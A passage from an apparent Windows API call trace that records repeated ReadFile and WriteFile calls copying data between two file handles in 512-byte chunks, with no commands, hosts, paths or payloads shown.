lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.154] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.161] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.165] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.167] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.171] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.191] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.194] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.196] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, 